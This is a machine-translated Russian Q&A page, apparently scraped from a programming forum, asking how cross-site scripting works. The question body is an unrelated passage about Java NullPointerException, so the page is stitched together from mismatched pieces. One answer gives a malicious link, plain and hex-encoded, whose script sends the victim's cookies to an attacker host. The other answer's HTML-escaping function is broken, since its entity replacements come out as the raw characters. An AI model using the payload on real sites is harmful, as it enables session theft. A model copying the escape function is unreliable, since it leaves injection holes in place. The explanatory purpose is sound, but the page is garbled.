Как XSS работает?

Question

Как XSS работает?

Когда вы объявляете ссылочную переменную (т. е. объект), вы действительно создаете указатель на объект. Рассмотрим следующий код, в котором вы объявляете переменную примитивного типа int:

int x;
x = 10;

В этом примере переменная x является int, и Java инициализирует ее для 0. Когда вы назначаете его 10 во второй строке, ваше значение 10 записывается в ячейку памяти, на которую указывает x.

Но когда вы пытаетесь объявить ссылочный тип, произойдет что-то другое. Возьмите следующий код:

Integer num;
num = new Integer(10);

Первая строка объявляет переменную с именем num, но она не содержит примитивного значения. Вместо этого он содержит указатель (потому что тип Integer является ссылочным типом). Поскольку вы еще не указали, что указать на Java, он устанавливает значение null, что означает «Я ничего не указываю».

Во второй строке ключевое слово new используется для создания экземпляра (или создания ) объекту типа Integer и переменной указателя num присваивается этот объект. Теперь вы можете ссылаться на объект, используя оператор разыменования . (точка).

Exception, о котором вы просили, возникает, когда вы объявляете переменную, но не создавали объект. Если вы попытаетесь разыменовать num. Перед созданием объекта вы получите NullPointerException. В самых тривиальных случаях компилятор поймает проблему и сообщит вам, что «num не может быть инициализирован», но иногда вы пишете код, который непосредственно не создает объект.

Например, вы можете имеют следующий метод:

public void doSomething(SomeObject obj) {
   //do something to obj
}

В этом случае вы не создаете объект obj, скорее предполагая, что он был создан до вызова метода doSomething. К сожалению, этот метод можно вызвать следующим образом:

doSomething(null);

В этом случае obj имеет значение null. Если метод предназначен для того, чтобы что-то сделать для переданного объекта, целесообразно бросить NullPointerException, потому что это ошибка программиста, и программисту понадобится эта информация для целей отладки.

Альтернативно, там могут быть случаи, когда цель метода заключается не только в том, чтобы работать с переданным в объекте, и поэтому нулевой параметр может быть приемлемым. В этом случае вам нужно будет проверить нулевой параметр и вести себя по-другому. Вы также должны объяснить это в документации. Например, doSomething может быть записано как:

/**
  * @param obj An optional foo for ____. May be null, in which case 
  *  the result will be ____.
  */
public void doSomething(SomeObject obj) {
    if(obj != null) {
       //do something
    } else {
       //do something else
    }
}

Наконец, Как определить исключение & amp; причина использования Трассировки стека

33

xss

задан Nitrodist 27 April 2012 в 13:00

2 ответа

Другие вопросы по тегам:
xss

Похожие вопросы:

19
Что является лучшими практиками для предотвращения xss нападения в сайте PHP - 3 May 2011 10:22

18
как я могу фильтровать и дезинфицировать параметры URL в slim 3 [duplicate] - 7 January 2016 15:33

13
Когда лучше санировать ввод данных пользователем? - 25 March 2019 03:39

10
Этот набор регулярных выражений полностью защищает от перекрестных сценариев сайта? - 23 August 2010 11:58

9
Как я могу избежать утечки xss? [Дубликат] - 3 January 2010 21:09

9
Как я могу санировать ввод пользователя с помощью PHP? - 26 June 2019 18:34

9
На основе этого кода, как я могу предотвратить атаку XSS? [Дубликат] - 3 January 2010 21:09

score 31 · Answer 1

Перекрестный Сайт, Пишущий сценарий в основном, является уязвимостью системы обеспечения безопасности динамических веб-страниц, где взломщик может создать злонамеренную ссылку для введения нежелательного исполняемого JavaScript в веб-сайт. Самый обычный случай этого, уязвимости происходят, когда ПОЛУЧАЮТ переменные, распечатан или отражен, не фильтруя или проверяя их содержание.

, Когда жертва нажимает на ссылку, вредоносный код может тогда отослать victimвЂ™s cookie к другому серверу, или это может изменить затронутый сайт, введя формы, для кражи имен пользователей и паролей и других методов фишинга.

Пример злонамеренной ссылки:

http://VulnerableHost/a.php?variable=<script>document.location='http://AttackersHost/cgi-bin/cookie.cgi%3Fdata='+document.cookie</script>

также распространено закодировать вредоносный код, например, в шестнадцатеричном числе:

http://VulnerableHost/a.php?variable=%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%41%74%74%61%63%6B%65%72%73%48%6F%73%74%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65%2E%63%67%69%3F%20%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E

score 19 · Answer 2

Уязвимость XSS существует каждый раз, когда строка снаружи Вашего приложения может быть интерпретирована как код.

, Например, если Вы генерируете HTML путем выполнения этого:

<BODY>
  <?= $myQueryParameter ?>
</BODY>

тогда, если $myQueryParameter переменная содержит <SCRIPT> тег тогда, это закончит тем, что выполнило код.

, Чтобы препятствовать тому, чтобы вход был выполнен как код, Вам нужно к [1 112] Escape содержание правильно.

вышеупомянутая проблема может быть решена путем понимания, что $myQueryParameter переменная содержит простой текст, но Вы не можете только пойти и поместить простой текст в HTML и ожидать, что он будет работать.

, Таким образом, необходимо преобразовать простой текст в HTML, таким образом, можно поместить его в страницу HTML. Тот процесс преобразования строки на одном языке другому так, чтобы это могло быть встроено, выходит.

можно выйти из простого текста к HTML с функцией как:

function escapePlainTextToHTML(plainText) { return plainText.replace(/\0/g, '') .replace(/&/g, '&') .replace(/</g, '<') .replace(/>/g, '>') .replace(/"/g, '"') .replace(/'/g, '''); }